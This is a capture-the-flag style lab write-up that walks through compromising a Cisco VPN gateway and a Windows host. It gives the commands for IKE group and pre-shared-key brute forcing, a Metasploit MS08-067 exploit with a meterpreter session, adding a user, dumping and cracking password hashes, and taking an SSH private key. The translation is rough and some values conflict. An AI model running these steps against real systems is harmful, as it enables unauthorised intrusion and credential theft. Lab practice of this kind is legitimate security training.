Test lab V8 (II): Cisco devices and Terminal Systems

Test lab V8 (II): Cisco devices and Terminal Systems

This is the second part of the test lab v8 report. In the first part, we broke two system websites and Cabinet through the gateway 192.168.101.6. In this section, we will see how to find the token of the Cisco device and Terminal system through the gateway 192.168.101.7.

Attack CISCO:
Run the following command to scan the gateway using nmap:
Nmap-sS-sV-Pn-p1-65535 192.168.101.7

Nmap finds two open ports, SSH and HTTP. We use a browser to access IP addresses and port 8100 and load an e-mail application. We found a valid logon credential for Ralph Westfall when attacking the Site and Cabinet systems. We tried to use this credential (RalphWestfall @ sas bank. lab/freeman) to log on and found that the logon was successful.

After logging on, we checked all the emails and found something of interest: VPN password.

If we look at the network topology, we will find a network device Cisco router. Now we try to access the VPN network. To achieve this goal, I need two tools, IKEforce and IKEscan. Run the following command to run IKEscan.
Sudo ike-scan-M-id = test-A 192.168.101.7
In the command,-M indicates the output readable information,-A indicates the active mode, and-id is A random group name required to run this tool.

From the screenshot above, we can get the following information:
Enc = 3DES
Hash = SHA1
Group = 2: modp1024
Auth = psk
Now, we use IKEforce to name a valid VPN group. We will use the default Dictionary of IKEforce to brute force group name. The command is as follows:
Sudo./ikeforce. py 192.168.101.7-e-w-wordlists/groupnames. dic-t 5 2 1 2
In the command, the-t parameter specifies the encryption type, hash type, group, and authentication method, which we have obtained using IKEscan. There is a table in the help document of this tool, as shown below:

After running this tool, we sent the correct group id, namely vpn.

Now that we have the correct group id, run the ike-scan tool again to capture the PSK handshake message and use the following command:
Sudo ike-scan-M-id = vpn-A 192.168.101.7-Pcapture. psk

After running, we get a capture. psk file.

Now we will try to brute force crack the psk file. The IKEscan toolkit has a psk-crack tool. We use the following command to perform brute force cracking.
Psk-crak-d/usr/share/wordlists/rockyou.txt capture. psk

As shown in, we found the correct key, which is: cicsc123.
Now we have the information related to VPN connection, and we have the following information:
Gateway IP-192.168.101.7
IPSec ID-vpn
IPSec secret-cisco123
Username-westfall
Password-AiWa8ahk
We tried to connect to the Cisco device by using vpnc, as shown in.

To determine whether the Internet can be connected, ping Google. However, when trying to ping Google's IP address, the system got a response.

This seems to be a DNS resolution problem, so we opened/etc/resolv. conf to find the problem, where we found the Token.

Attack TERMINAL:
Now we can connect to the VPN, so we can attack the machine TERMINAL in another network. Before running the tool, we need to confirm that we have connected to Cisco VPN and use nmap for port scanning. The command is as follows:

Nmap-sS-sV-Pn-A 192.168.0.2

By checking the port, the system seems to have a famous netapi vulnerability. Port 445 is open and the samba service is running, which is vulnerable to remote attacks. Run the following command on Metasploit:
Use exploit/windows/smb/ms08_067_netapi
Set payload windows/meterpreter/bind_tcp
Set RHOST 192.168.0.2
Exploit

The vulnerability was exploited smoothly. Now we have a meterpreter session. We use a post vulnerability exploitation module that adds a user to the system. The command is as follows:
Run getgui-u test-p test

Now we can use test/test to log on to the Terminal system.

Once we log on to the system, we need to find the token file. Start-> Administrative Tools-> Computer Management, click Local Users and Groups-> Users, the token is found in the account description of westfall.

Our work has not been terminated yet. No matter when we break down the system, we need to browse the entire system to find the files and information that can help us break down other systems on the network. As we can see below, there are many users in the system, maybe some of them can be used to log on to other systems, so we use meterprter to get the hash of all users. The command is:
Run hashdump

Copy all the hashes to a text file, and then use the Ophcrack tool to crack it. We use the XP fast and XP small tables. The following is the hash cracking result:

We found a ppk file on the westfall desktop, generated by Putty.

Copy the ppk file to our local system. Now we need to convert the ppk file to the OpenSSH format. Therefore, we need to use the Puttygen tool to open the tool and then click load.

Select the ppk file and select Conversions> Export OpenSSH key

In the output information, we can obtain the SSH private key.

Now, the attack on the Terminal system is finally completed.